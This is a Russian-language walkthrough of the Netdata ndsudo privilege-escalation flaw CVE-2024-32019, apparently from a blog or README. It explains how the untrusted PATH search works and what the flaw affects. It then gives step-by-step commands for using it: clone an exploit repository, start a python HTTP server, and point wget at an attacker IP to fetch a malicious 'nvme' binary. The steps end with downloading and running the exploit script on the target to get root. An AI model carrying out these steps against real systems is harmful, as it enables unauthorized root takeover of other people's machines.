
Эксплойт уязвимости NDSUDO
Уязвимость ndsudo позволяет злоумышленнику получить права root, эксплуатируя ненадёжный путь поиска в инструменте ndsudo, который является частью Netdata Agent. Это может позволить выполнение произвольных программ с повышенными привилегиями, если злоумышленник поместит вредоносный бинарный файл в доступную для записи директорию и соответствующим образом изменит переменную окружения PATH.
Уязвимость ndsudo, идентифицированная как CVE-2024-32019, затрагивает версии инструмента ndsudo, включённые в Netdata Agent, а именно версии v1.45.0 и ниже. Эта уязвимость позволяет злоумышленникам повышать привилегии в системах, где установлен данный инструмент.
Как работает уязвимость:
Механизм эксплуатации:-
Ненадёжный путь поиска: Инструмент ndsudo использует переменную окружения PATH для поиска внешних команд. Злоумышленник может манипулировать этой переменной, чтобы указать на контролируемую им директорию.
Выполнение вредоносных бинарных файлов: Размещая вредоносный исполняемый файл с тем же именем, что и команда, которую ndsudo может
запускать (например, nvme), в доступной для записи директории, злоумышленник может выполнить произвольный код с правами root.
Сложность атаки:-
Низкая сложность: Атака не требует продвинутых навыков; легко создаваемый bash-скрипт может быть использован для повышения привилегий, что делает её доступной для многих потенциальных злоумышленников.
Влияние уязвимости:-
Повышение привилегий: Успешная эксплуатация позволяет злоумышленнику получить доступ root, что может привести к полному контролю над затронутой системой.
Потенциальные риски: Это может привести к несанкционированному доступу к данным, манипуляции системой и дальнейшей эксплуатации сетевых ресурсов.
ПОВЫШЕНИЕ ПРИВИЛЕГИЙ Я создал два bash-скрипта для лёгкого получения доступа от пользователя к root. Следуйте шагам, описанным ниже :-
git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git
cd CVE-2024-32019-ndsudo
chmod +x ndsudo_exp.sh
Теперь создайте python сервер :
python3 -m http.server 8080
Откройте файл ndsudo_exploit.sh с помощью gedit или pluma, в зависимости от того, что доступно. Вы увидите команду wget, подобную этой :
wget http://10.10.14.70:8080/nvme -o /tmp/nvme
Измените ip-адрес на ip вашей собственной машины
Теперь перейдите на целевую машину, откройте терминал и выполните следующее:
wget http://<your-ip-addr>:8080/ndsudo_exploit.sh
chmod +x ndsudo_exploit.sh
./ndsudo_exploit.sh